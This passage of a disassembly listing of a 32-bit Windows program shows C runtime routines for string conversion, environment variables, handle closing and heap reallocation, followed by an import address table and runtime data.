call esi ; MultiByteToWideChar
test eax, eax
jz short loc_408E27
push ebx
push ebx
push [ebp+arg_14]
push [ebp+arg_10]
push 9
push [ebp+arg_18]
call esi ; MultiByteToWideChar
mov esi, eax
mov [ebp+var_20], esi
cmp esi, ebx
jz short loc_408E27
mov [ebp+var_4], edi
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_403E90
mov [ebp+var_18], esp
mov edi, esp
mov [ebp+var_28], edi
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_408DF6
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor edi, edi
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_20]
loc_408DF6: ; CODE XREF: sub_408BBE+224�j
cmp edi, ebx
jz short loc_408E27
push esi
push edi
push [ebp+arg_14]
push [ebp+arg_10]
push 1
push [ebp+arg_18]
call dword_40A094 ; MultiByteToWideChar
test eax, eax
jz short loc_408E27
push esi
push edi
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_40A060 ; CompareStringW
jmp short loc_408E29
; ---------------------------------------------------------------------------
loc_408E27: ; CODE XREF: sub_408BBE+63�j
; sub_408BBE+C6�j ...
xor eax, eax
loc_408E29: ; CODE XREF: sub_408BBE+BF�j
; sub_408BBE+EE�j ...
lea esp, [ebp-4Ch]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_408BBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408E3B proc near ; CODE XREF: sub_408AA3+50�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp [ebp+arg_0], edi
jz short loc_408E9F
push 3Dh
push [ebp+arg_0]
call sub_4093FF
mov esi, eax
pop ecx
cmp esi, edi
pop ecx
mov [ebp+var_8], esi
jz short loc_408E9F
cmp [ebp+arg_0], esi
jz short loc_408E9F
mov eax, dword_40E420
xor ebx, ebx
cmp [esi+1], bl
setz bl
cmp eax, dword_40E424
jnz short loc_408E85
push eax
call sub_40901A
pop ecx
mov dword_40E420, eax
loc_408E85: ; CODE XREF: sub_408E3B+3C�j
cmp eax, edi
jnz short loc_408EDD
cmp [ebp+arg_4], edi
jz short loc_408EA7
cmp dword_40E428, edi
jz short loc_408EA7
call sub_408AA3
test eax, eax
jz short loc_408EDD
loc_408E9F: ; CODE XREF: sub_408E3B+D�j
; sub_408E3B+22�j ...
or eax, 0FFFFFFFFh
loc_408EA2: ; CODE XREF: sub_408E3B+182�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_408EA7: ; CODE XREF: sub_408E3B+51�j
; sub_408E3B+59�j
cmp ebx, edi
jnz loc_408FBB
push 4
call sub_40345E
cmp eax, edi
pop ecx
mov dword_40E420, eax
jz short loc_408E9F
mov [eax], edi
cmp dword_40E428, edi
jnz short loc_408EDD
push 4
call sub_40345E
cmp eax, edi
pop ecx
mov dword_40E428, eax
jz short loc_408E9F
mov [eax], edi
loc_408EDD: ; CODE XREF: sub_408E3B+4C�j
; sub_408E3B+62�j ...
sub esi, [ebp+arg_0]
mov edi, dword_40E420
mov [ebp+var_4], edi
push esi
push [ebp+arg_0]
call sub_408FC2
mov esi, eax
pop ecx
test esi, esi
pop ecx
jl short loc_408F3D
cmp dword ptr [edi], 0
jz short loc_408F3D
test ebx, ebx
jz short loc_408F35
push dword ptr [edi+esi*4]
lea edi, [edi+esi*4]
call sub_403B18
pop ecx
loc_408F0F: ; CODE XREF: sub_408E3B+E2�j
cmp dword ptr [edi], 0
jz short loc_408F1F
mov eax, [edi+4]
inc esi
mov [edi], eax
add edi, 4
jmp short loc_408F0F
; ---------------------------------------------------------------------------
loc_408F1F: ; CODE XREF: sub_408E3B+D7�j
mov eax, esi
shl eax, 2
push eax
push [ebp+var_4]
call sub_40915F
pop ecx
test eax, eax
pop ecx
jz short loc_408F6F
jmp short loc_408F6A
; ---------------------------------------------------------------------------
loc_408F35: ; CODE XREF: sub_408E3B+C6�j
mov eax, [ebp+arg_0]
mov [edi+esi*4], eax
jmp short loc_408F6F
; ---------------------------------------------------------------------------
loc_408F3D: ; CODE XREF: sub_408E3B+BD�j
; sub_408E3B+C2�j
test ebx, ebx
jnz short loc_408FBB
test esi, esi
jge short loc_408F47
neg esi
loc_408F47: ; CODE XREF: sub_408E3B+108�j
lea eax, ds:8[esi*4]
push eax
push edi
call sub_40915F
pop ecx
test eax, eax
pop ecx
jz loc_408E9F
mov ecx, [ebp+arg_0]
mov [eax+esi*4], ecx
and dword ptr [eax+esi*4+4], 0
loc_408F6A: ; CODE XREF: sub_408E3B+F8�j
mov dword_40E420, eax
loc_408F6F: ; CODE XREF: sub_408E3B+F6�j
; sub_408E3B+100�j
cmp [ebp+arg_4], 0
jz short loc_408FBB
push [ebp+arg_0]
call sub_403B90
inc eax
inc eax
push eax
call sub_40345E
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_408FBB
push [ebp+arg_0]
push esi
call sub_403CB0
mov eax, esi
pop ecx
sub eax, [ebp+arg_0]
pop ecx
add eax, [ebp+var_8]
and byte ptr [eax], 0
inc eax
neg ebx
sbb ebx, ebx
not ebx
and ebx, eax
push ebx
push esi
call dword_40A164 ; SetEnvironmentVariableA
push esi
call sub_403B18
pop ecx
loc_408FBB: ; CODE XREF: sub_408E3B+6E�j
; sub_408E3B+104�j ...
xor eax, eax
jmp loc_408EA2
sub_408E3B endp
; =============== S U B R O U T I N E =======================================
sub_408FC2 proc near ; CODE XREF: sub_408E3B+B2�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, dword_40E420
push edi
mov eax, [esi]
test eax, eax
jz short loc_408FFD
mov edi, [esp+8+arg_4]
loc_408FD4: ; CODE XREF: sub_408FC2+39�j
push edi
push eax
push [esp+10h+arg_0]
call sub_408A64
add esp, 0Ch
test eax, eax
jnz short loc_408FF3
mov eax, [esi]
mov al, [eax+edi]
cmp al, 3Dh
jz short loc_40900D
test al, al
jz short loc_40900D
loc_408FF3: ; CODE XREF: sub_408FC2+22�j
mov eax, [esi+4]
add esi, 4
test eax, eax
jnz short loc_408FD4
loc_408FFD: ; CODE XREF: sub_408FC2+C�j
mov eax, esi
sub eax, dword_40E420
sar eax, 2
neg eax
loc_40900A: ; CODE XREF: sub_408FC2+56�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_40900D: ; CODE XREF: sub_408FC2+2B�j
; sub_408FC2+2F�j
mov eax, esi
sub eax, dword_40E420
sar eax, 2
jmp short loc_40900A
sub_408FC2 endp
; =============== S U B R O U T I N E =======================================
sub_40901A proc near ; CODE XREF: sub_408E3B+3F�p
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
xor ecx, ecx
test edi, edi
jnz short loc_409029
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_409029: ; CODE XREF: sub_40901A+9�j
cmp dword ptr [edi], 0
lea eax, [edi+4]
jz short loc_40903B
loc_409031: ; CODE XREF: sub_40901A+1F�j
mov edx, [eax]
inc ecx
add eax, 4
test edx, edx
jnz short loc_409031
loc_40903B: ; CODE XREF: sub_40901A+15�j
push ebx
push ebp
lea eax, ds:4[ecx*4]
push esi
push eax
call sub_40345E
mov esi, eax
pop ecx
test esi, esi
mov ebp, esi
jnz short loc_40905C
push 9
call sub_4042F6
pop ecx
loc_40905C: ; CODE XREF: sub_40901A+38�j
mov eax, [edi]
mov ebx, edi
loc_409060: ; CODE XREF: sub_40901A+5B�j
test eax, eax
jz short loc_409077
push eax
add ebx, 4
call sub_409472
mov [esi], eax
mov eax, [ebx]
pop ecx
add esi, 4
jmp short loc_409060
; ---------------------------------------------------------------------------
loc_409077: ; CODE XREF: sub_40901A+48�j
and dword ptr [esi], 0
mov eax, ebp
pop esi
pop ebp
pop ebx
pop edi
retn
sub_40901A endp
; =============== S U B R O U T I N E =======================================
sub_409081 proc near ; CODE XREF: sub_408B11+2A�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
cmp edi, dword_410620
jnb loc_40911B
mov eax, edi
mov esi, edi
sar eax, 5
and esi, 1Fh
lea ebx, ds:410520h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [eax+esi+4], 1
jz short loc_40911B
push edi
call sub_408808
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_4090FA
cmp edi, 1
jz short loc_4090C8
cmp edi, 2
jnz short loc_4090DE
loc_4090C8: ; CODE XREF: sub_409081+40�j
push 2
call sub_408808
push 1
mov ebp, eax
call sub_408808
pop ecx
cmp eax, ebp
pop ecx
jz short loc_4090FA
loc_4090DE: ; CODE XREF: sub_409081+45�j
push edi
call sub_408808
pop ecx
push eax
call dword_40A0D8 ; CloseHandle
test eax, eax
jnz short loc_4090FA
call dword_40A0F4 ; RtlGetLastWin32Error
mov ebp, eax
jmp short loc_4090FC
; ---------------------------------------------------------------------------
loc_4090FA: ; CODE XREF: sub_409081+3B�j
; sub_409081+5B�j ...
xor ebp, ebp
loc_4090FC: ; CODE XREF: sub_409081+77�j
push edi
call sub_40878E
mov eax, [ebx]
pop ecx
and byte ptr [eax+esi+4], 0
test ebp, ebp
jz short loc_409117
push ebp
call sub_408727
pop ecx
jmp short loc_40912C
; ---------------------------------------------------------------------------
loc_409117: ; CODE XREF: sub_409081+8B�j
xor eax, eax
jmp short loc_40912F
; ---------------------------------------------------------------------------
loc_40911B: ; CODE XREF: sub_409081+E�j
; sub_409081+2F�j
and dword_40E3FC, 0
mov dword_40E3F8, 9
loc_40912C: ; CODE XREF: sub_409081+94�j
or eax, 0FFFFFFFFh
loc_40912F: ; CODE XREF: sub_409081+98�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_409081 endp
; =============== S U B R O U T I N E =======================================
sub_409134 proc near ; CODE XREF: sub_408B11+22�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi+0Ch]
test al, 83h
jz short loc_40915D
test al, 8
jz short loc_40915D
push dword ptr [esi+8]
call sub_403B18
and word ptr [esi+0Ch], 0FBF7h
xor eax, eax
pop ecx
mov [esi], eax
mov [esi+8], eax
mov [esi+4], eax
loc_40915D: ; CODE XREF: sub_409134+A�j
; sub_409134+E�j
pop esi
retn
sub_409134 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40915F proc near ; CODE XREF: sub_408E3B+ED�p
; sub_408E3B+115�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
push ebx
push esi
push edi
jnz short loc_40917A
push [ebp+arg_4]
call sub_40345E
pop ecx
jmp loc_4093FA
; ---------------------------------------------------------------------------
loc_40917A: ; CODE XREF: sub_40915F+B�j
mov esi, [ebp+arg_4]
test esi, esi
jnz short loc_40918F
push [ebp+arg_0]
call sub_403B18
pop ecx
jmp loc_4093F8
; ---------------------------------------------------------------------------
loc_40918F: ; CODE XREF: sub_40915F+20�j
mov eax, dword_410644
cmp eax, 3
jnz loc_40929F
loc_40919D: ; CODE XREF: sub_40915F+12E�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_40927B
push [ebp+arg_0]
call sub_404574
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_409256
cmp esi, dword_41063C
ja short loc_40920F
mov edi, [ebp+arg_0]
push esi
push edi
push ebx
call sub_404D7D
add esp, 0Ch
test eax, eax
jnz short loc_40920B
push esi
call sub_4048C8
mov edi, eax
pop ecx
test edi, edi
jz short loc_40920F
mov ebx, [ebp+arg_0]
mov eax, [ebx-4]
dec eax
cmp eax, esi
jb short loc_4091EF
mov eax, esi
loc_4091EF: ; CODE XREF: sub_40915F+8C�j
push eax
push ebx
push edi
call sub_403510
push ebx
call sub_404574
push [ebp+arg_0]
mov ebx, eax
push ebx
call sub_40459F
add esp, 18h
loc_40920B: ; CODE XREF: sub_40915F+74�j
test edi, edi
jnz short loc_409252
loc_40920F: ; CODE XREF: sub_40915F+62�j
; sub_40915F+81�j
test esi, esi
jnz short loc_409216
push 1
pop esi
loc_409216: ; CODE XREF: sub_40915F+B2�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_410640
call dword_40A110 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_409252
mov ecx, [ebp+arg_0]
mov eax, [ecx-4]
dec eax
cmp eax, esi
jb short loc_40923E
mov eax, esi
loc_40923E: ; CODE XREF: sub_40915F+DB�j
push eax
push ecx
push edi
call sub_403510
push [ebp+arg_0]
push ebx
call sub_40459F
add esp, 14h
loc_409252: ; CODE XREF: sub_40915F+AE�j
; sub_40915F+D0�j
test ebx, ebx
jnz short loc_409277
loc_409256: ; CODE XREF: sub_40915F+56�j
test esi, esi
jnz short loc_40925D
push 1
pop esi
loc_40925D: ; CODE XREF: sub_40915F+F9�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_410640
call dword_40A154 ; RtlReAllocateHeap
mov edi, eax
loc_409277: ; CODE XREF: sub_40915F+F5�j
test edi, edi
jnz short loc_409298
loc_40927B: ; CODE XREF: sub_40915F+43�j
cmp dword_40E46C, 0
jz short loc_409298
push esi
call sub_40433F
test eax, eax
pop ecx
jnz loc_40919D
jmp loc_4093F8
; ---------------------------------------------------------------------------
loc_409298: ; CODE XREF: sub_40915F+11A�j
; sub_40915F+123�j ...
mov eax, edi
jmp loc_4093FA
; ---------------------------------------------------------------------------
loc_40929F: ; CODE XREF: sub_40915F+38�j
cmp eax, 2
jnz loc_4093BA
cmp esi, 0FFFFFFE0h
ja short loc_4092BC
test esi, esi
jbe short loc_4092B9
add esi, 0Fh
and esi, 0FFFFFFF0h
jmp short loc_4092BC
; ---------------------------------------------------------------------------
loc_4092B9: ; CODE XREF: sub_40915F+150�j
push 10h
pop esi
loc_4092BC: ; CODE XREF: sub_40915F+14C�j
; sub_40915F+158�j ...
xor edi, edi
cmp esi, 0FFFFFFE0h
ja loc_40939C
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_4052CF
mov ebx, eax
add esp, 0Ch
test ebx, ebx
jz loc_409380
cmp esi, dword_40DA74
jnb short loc_409344
mov edi, esi
shr edi, 4
push edi
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_405697
add esp, 10h
test eax, eax
jz short loc_40930A
mov edi, [ebp+arg_0]
jmp short loc_40933C
; ---------------------------------------------------------------------------
loc_40930A: ; CODE XREF: sub_40915F+1A4�j
push edi
call sub_40536B
mov edi, eax
pop ecx
test edi, edi
jz short loc_409344
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_409323
mov eax, esi
loc_409323: ; CODE XREF: sub_40915F+1C0�j
push eax
push [ebp+arg_0]
push edi
call sub_403510
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_405326
add esp, 18h
loc_40933C: ; CODE XREF: sub_40915F+1A9�j
test edi, edi
jnz loc_409298
loc_409344: ; CODE XREF: sub_40915F+18B�j
; sub_40915F+1B6�j
push esi
push 0
push dword_410640
call dword_40A110 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jz short loc_40939C
movzx eax, byte ptr [ebx]
shl eax, 4
cmp eax, esi
jb short loc_409365
mov eax, esi
loc_409365: ; CODE XREF: sub_40915F+202�j
push eax
push [ebp+arg_0]
push edi
call sub_403510
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call sub_405326
add esp, 18h
jmp short loc_409394
; ---------------------------------------------------------------------------
loc_409380: ; CODE XREF: sub_40915F+17F�j
push esi
push [ebp+arg_0]
push 0
push dword_410640
call dword_40A154 ; RtlReAllocateHeap
mov edi, eax
loc_409394: ; CODE XREF: sub_40915F+21F�j
test edi, edi
jnz loc_409298
loc_40939C: ; CODE XREF: sub_40915F+162�j
; sub_40915F+1F8�j
cmp dword_40E46C, 0
jz loc_409298
push esi
call sub_40433F
test eax, eax
pop ecx
jnz loc_4092BC
jmp short loc_4093F8
; ---------------------------------------------------------------------------
loc_4093BA: ; CODE XREF: sub_40915F+143�j
; sub_40915F+297�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_4093E4
test esi, esi
jnz short loc_4093C8
push 1
pop esi
loc_4093C8: ; CODE XREF: sub_40915F+264�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push [ebp+arg_0]
push 0
push dword_410640
call dword_40A154 ; RtlReAllocateHeap
test eax, eax
jnz short loc_4093FA
loc_4093E4: ; CODE XREF: sub_40915F+260�j
cmp dword_40E46C, 0
jz short loc_4093FA
push esi
call sub_40433F
test eax, eax
pop ecx
jnz short loc_4093BA
loc_4093F8: ; CODE XREF: sub_40915F+2B�j
; sub_40915F+134�j ...
xor eax, eax
loc_4093FA: ; CODE XREF: sub_40915F+16�j
; sub_40915F+13B�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_40915F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4093FF proc near ; CODE XREF: sub_408E3B+14�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
cmp dword_40F2CC, 0
jnz short loc_40941A
push [ebp+arg_4]
push [ebp+arg_0]
call sub_406310
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40941A: ; CODE XREF: sub_4093FF+A�j
mov ecx, [ebp+arg_0]
loc_40941D: ; CODE XREF: sub_4093FF+56�j
movzx ax, byte ptr [ecx]
test ax, ax
jz short loc_409460
movzx edx, al
test byte_40F3E1[edx], 4
jz short loc_40944C
mov dl, [ecx+1]
inc ecx
test dl, dl
jz short loc_409457
movzx eax, ax
movzx edx, dl
shl eax, 8
or eax, edx
cmp [ebp+arg_4], eax
jz short loc_40945B
jmp short loc_409454
; ---------------------------------------------------------------------------
loc_40944C: ; CODE XREF: sub_4093FF+31�j
movzx edx, ax
cmp [ebp+arg_4], edx
jz short loc_409460
loc_409454: ; CODE XREF: sub_4093FF+4B�j
inc ecx
jmp short loc_40941D
; ---------------------------------------------------------------------------
loc_409457: ; CODE XREF: sub_4093FF+39�j
xor eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_40945B: ; CODE XREF: sub_4093FF+49�j
lea eax, [ecx-1]
pop ebp
retn
; ---------------------------------------------------------------------------
loc_409460: ; CODE XREF: sub_4093FF+25�j
; sub_4093FF+53�j
movzx edx, ax
mov eax, [ebp+arg_4]
sub eax, edx
neg eax
sbb eax, eax
not eax
and eax, ecx
pop ebp
retn
sub_4093FF endp
; =============== S U B R O U T I N E =======================================
sub_409472 proc near ; CODE XREF: sub_4018FD+5BD�p
; sub_40901A+4E�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_409499
push esi
call sub_403B90
inc eax
push eax
call sub_40345E
pop ecx
test eax, eax
pop ecx
jz short loc_409499
push esi
push eax
call sub_403CB0
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_409499: ; CODE XREF: sub_409472+7�j
; sub_409472+1A�j
xor eax, eax
pop esi
retn
sub_409472 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4094A0 proc near ; CODE XREF: sub_403EC0+13�p
jmp dword_40A128
sub_4094A0 endp
; ---------------------------------------------------------------------------
align 4
dd 2D6h dup(0)
dword_40A000 dd 77DD189Ah ; DATA XREF: sub_4025AD+15E�r
; sub_402716+79�r ...
dword_40A004 dd 77DD59F0h ; DATA XREF: sub_4025AD+3E�r
; sub_402716+43�r ...
dword_40A008 dd 77DD22EAh ; DATA XREF: sub_4025AD+20�r
; sub_402716+8�r ...
dword_40A00C dd 77DD590Bh ; DATA XREF: sub_4028DE+51�r
dword_40A010 dd 77DD5C55h ; DATA XREF: sub_40296A+62�r
; sub_402AC3+85�r
dword_40A014 dd 77DD23D7h ; DATA XREF: sub_40296A+47�r
dword_40A018 dd 77DD839Fh ; DATA XREF: sub_4029DE+87�r
; sub_4029DE+CD�r
dword_40A01C dd 77DD842Ah ; DATA XREF: sub_4029DE+73�r
dword_40A020 dd 77DDAE23h ; DATA XREF: sub_4029DE+3C�r
; sub_402AC3+3C�r
dword_40A024 dd 77DD7F3Eh ; DATA XREF: sub_402AC3+71�r
dword_40A028 dd 77DDAB2Fh ; DATA XREF: sub_402C5C+89�r
; sub_402C5C+94�r ...
dword_40A02C dd 77DE09ECh ; DATA XREF: sub_402C5C+6B�r
dword_40A030 dd 77E2C1B3h ; DATA XREF: sub_402C5C+51�r
dword_40A034 dd 77DE1291h ; DATA XREF: sub_402C5C+4A�r
; sub_402D53+5E�r
dword_40A038 dd 77E2BC20h ; DATA XREF: sub_402C5C+40�r
; sub_402CF9+40�r ...
dword_40A03C dd 77DE801Bh ; DATA XREF: sub_402C5C+24�r
; sub_402CF9+26�r ...
dword_40A040 dd 77DDA20Bh ; DATA XREF: sub_402C5C+B�r
; sub_402CF9+C�r ...
dword_40A044 dd 77DE8075h ; DATA XREF: sub_402CF9+49�r
; sub_402DC2+C3�r
dword_40A048 dd 77E2BE75h ; DATA XREF: sub_402DC2+6A�r
dword_40A04C dd 77E2BF4Bh ; DATA XREF: sub_402DC2+5C�r
dword_40A050 dd 77DE7E48h ; DATA XREF: sub_402EED+21�r
; sub_402F19+30�r
dword_40A054 dd 77DE138Bh ; DATA XREF: sub_402F19+10�r
dword_40A058 dd 77DE1EBDh ; DATA XREF: sub_4032FB+E0�r
dd 7FFFFFFFh
dword_40A060 dd 77E77F2Eh ; DATA XREF: sub_408BBE+3E�r
; sub_408BBE+261�r
dword_40A064 dd 77E762D0h ; DATA XREF: sub_408BBE+5B�r
; sub_408BBE+B9�r
dword_40A068 dd 77E73FF9h ; DATA XREF: sub_408B67+2C�r
dword_40A06C dd 77E7FF2Eh ; DATA XREF: sub_40878E:loc_4087E1�r
dword_40A070 dd 77E805D8h ; DATA XREF: sub_40844F+12�r
dword_40A074 dd 77E7A5FDh ; DATA XREF: sub_40844F+1E�r
dword_40A078 dd 77E6C703h ; DATA XREF: sub_408208+1A�r
dword_40A07C dd 77E7A13Fh ; DATA XREF: sub_408208+2F�r
dword_40A080 dd 77E7849Fh ; DATA XREF: sub_40806F+48�r
; sub_4082AE+14�r ...
dword_40A084 dd 77E781F9h ; DATA XREF: sub_407DDE+42�r
; sub_407DDE+14D�r ...
dword_40A088 dd 77E77405h ; DATA XREF: sub_407DDE+5E�r
; sub_407DDE+A7�r
dword_40A08C dd 77E7C866h ; DATA XREF: sub_407C95+3F�r
; sub_407C95+12D�r
dword_40A090 dd 77E641EBh ; DATA XREF: sub_407C95+59�r
; sub_407C95+8D�r
dword_40A094 dd 77E77CCEh ; DATA XREF: sub_407C95+C5�r
; sub_407C95+11B�r ...
dword_40A098 dd 77E78C81h ; DATA XREF: sub_4077D4+4F�r
dword_40A09C dd 77E79D8Ch ; DATA XREF: sub_406BC4+14A�r
; sub_40786E+D8�r ...
dword_40A0A0 dd 77E78406h ; DATA XREF: sub_4069E0+FF�r
; sub_4069E0+166�r
dword_40A0A4 dd 77E79C3Dh ; DATA XREF: sub_4069E0+158�r
; sub_406BC4+143�r
dword_40A0A8 dd 77E7C931h ; DATA XREF: sub_4069E0+19D�r
dword_40A0AC dd 77E77EE1h ; DATA XREF: sub_4068AE+9�r
dword_40A0B0 dd 77E67702h ; DATA XREF: sub_4068AE:loc_4068DD�r
; sub_4068AE+E1�r
dword_40A0B4 dd 77E79924h ; DATA XREF: sub_4068AE+7E�r
; sub_40728A+AB�r ...
dword_40A0B8 dd 77E61BE6h ; DATA XREF: sub_401586+A4�r
dword_40A0BC dd 77E684C6h ; DATA XREF: sub_401635+2BC�r
dword_40A0C0 dd 77E7A099h ; DATA XREF: sub_401635+287�r
; sub_4025AD+1A�r ...
dword_40A0C4 dd 77E7AC37h ; DATA XREF: sub_4018FD+B8�r
dword_40A0C8 dd 77E80656h ; DATA XREF: sub_4018FD+4E�r
dword_40A0CC dd 77E704FCh ; DATA XREF: sub_4025AD+CF�r
; sub_4032FB+61�r
dword_40A0D0 dd 77E73628h ; DATA XREF: sub_40296A+58�r
; sub_402C5C+79�r
dword_40A0D4 dd 77E75CB5h ; DATA XREF: sub_402B5D+F4�r
; sub_403923+91�r ...
dword_40A0D8 dd 77E77963h ; DATA XREF: sub_402B5D+E6�r
; sub_409081+65�r
dword_40A0DC dd 77E61BB8h ; DATA XREF: sub_402B5D+D9�r
dword_40A0E0 dd 77E70396h ; DATA XREF: sub_402B5D+7C�r
dword_40A0E4 dd 77E6BD13h ; DATA XREF: sub_402B5D+6F�r
dword_40A0E8 dd 77E6808Fh ; DATA XREF: sub_402B5D+5A�r
dword_40A0EC dd 77E705C5h ; DATA XREF: sub_402B5D+4E�r
dword_40A0F0 dd 77E616B4h ; DATA XREF: sub_403923+17�r
dword_40A0F4 dd 77F5157Dh ; DATA XREF: sub_4032B7+13�r
; sub_4077D4+5C�r ...
dword_40A0F8 dd 77E705B0h ; DATA XREF: sub_4032FB+42�r
dword_40A0FC dd 77E79A45h ; DATA XREF: sub_402C5C+80�r
dword_40A100 dd 77E79881h ; DATA XREF: sub_402C5C+5F�r
dword_40A104 dd 77E73BEFh ; DATA XREF: sub_402DC2+A5�r
dword_40A108 dd 77E7C2C4h ; DATA XREF: sub_4032B7+9�r
dword_40A10C dd 77E78C17h ; DATA XREF: sub_4032FB+D�r
dword_40A110 dd 77F516F8h ; DATA XREF: sub_40349C+6C�r
; sub_40452C+D�r ...
dword_40A114 dd 77E79C90h ; DATA XREF: sub_403923+10�r
dword_40A118 dd 77E76E3Dh ; DATA XREF: sub_4039D6+6C�r
; sub_40728A+38�r
dword_40A11C dd 77E61608h ; DATA XREF: sub_4039D6+17�r
dword_40A120 dd 77E70F89h ; DATA XREF: sub_4039D6+D�r
dword_40A124 dd 77F51597h ; DATA XREF: sub_403B18+60�r
; sub_40459F+2C5�r ...
dword_40A128 dd 77F6183Eh ; DATA XREF: sub_4094A0�r
dword_40A12C dd 77E79F93h ; DATA XREF: sub_404200+C2�r
; sub_40435A+A�r
dword_40A130 dd 77E6177Ah ; DATA XREF: sub_404200+9F�r
; sub_4069E0+59�r
dword_40A134 dd 77E7C938h ; DATA XREF: sub_404200+74�r
dword_40A138 dd 77E7C486h ; DATA XREF: sub_404200+26�r
dword_40A13C dd 77E7AC5Eh ; DATA XREF: sub_404387+54�r
dword_40A140 dd 77E7C657h ; DATA XREF: sub_404387+1F�r
dword_40A144 dd 77E76E0Bh ; DATA XREF: sub_4044CF+50�r
dword_40A148 dd 77E7C726h ; DATA XREF: sub_4044CF+11�r
dword_40A14C dd 77E79E34h ; DATA XREF: sub_40459F+240�r
; sub_405073+120�r ...
dword_40A150 dd 77E7980Ah ; DATA XREF: sub_404BD1+76�r
; sub_404C82+51�r ...
dword_40A154 dd 77F5722Fh ; DATA XREF: sub_404BD1+28�r
; sub_40915F+110�r ...
dword_40A158 dd 77EB9A84h ; DATA XREF: sub_4063CC+138�r
dword_40A15C dd 77E9C5B1h ; DATA XREF: sub_4068AE+11F�r
dword_40A160 dd 77E7C9E1h ; DATA XREF: sub_4068AE+CE�r
dword_40A164 dd 77E6BD68h ; DATA XREF: sub_408E3B+173�r
dd 0FFFFFFFFh
dword_40A16C dd 71AB1ED3h ; DATA XREF: sub_403452�r
dword_40A170 dd 71AB1A6Dh ; DATA XREF: sub_40344C�r
dword_40A174 dd 71AD1020h ; DATA XREF: sub_403446�r
dword_40A178 dd 71AB1AF4h ; DATA XREF: sub_403440�r
dword_40A17C dd 71AB868Dh ; DATA XREF: sub_40343A�r
dword_40A180 dd 71AB5DE2h ; DATA XREF: sub_403434�r
dword_40A184 dd 71AB3C22h ; DATA XREF: sub_40342E�r
dword_40A188 dd 71AB155Ah ; DATA XREF: sub_403428�r
dword_40A18C dd 71AB1740h ; DATA XREF: sub_40341C�r
dword_40A190 dd 71AB1746h ; DATA XREF: sub_403416�r
dword_40A194 dd 71AB3ECEh ; DATA XREF: sub_403410�r
dword_40A198 dd 71AB1890h ; DATA XREF: sub_40340A�r
dword_40A19C dd 71AB1B7Bh ; DATA XREF: sub_403404�r
dword_40A1A0 dd 71AB12F8h ; DATA XREF: sub_4033FE�r
dword_40A1A4 dd 71AB2BBFh ; DATA XREF: sub_4033F8�r
dword_40A1A8 dd 71AB41DAh ; DATA XREF: sub_403458�r
dword_40A1AC dd 71AB3E5Dh ; DATA XREF: sub_403422�r
dd 7FFFFFFFh, 0
dword_40A1B8 dd 0FFFFFFFFh, 40258Dh, 402597h, 0 ; DATA XREF: sub_4018FD+5�o
dword_40A1C8 dd 0FFFFFFFFh, 4042D7h, 4042EBh ; DATA XREF: sub_404200+5�o
a__global_heap_ db '__GLOBAL_HEAP_SELECTED',0 ; DATA XREF: sub_404387+8E�o
align 4
a__msvcrt_heap_ db '__MSVCRT_HEAP_SELECT',0 ; DATA XREF: sub_404387+4F�o
align 4
byte_40A204 db 6 ; DATA XREF: sub_405917:loc_40597C�r
db 2 dup(0), 6
dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
dd 50h, 38282000h, 8075850h, 30303700h, 75057h, 8202000h
dd 0
dd 60686008h, 606060h, 78707000h, 8787878h, 807h, 8080007h
dd 8000008h, 7000800h, 8
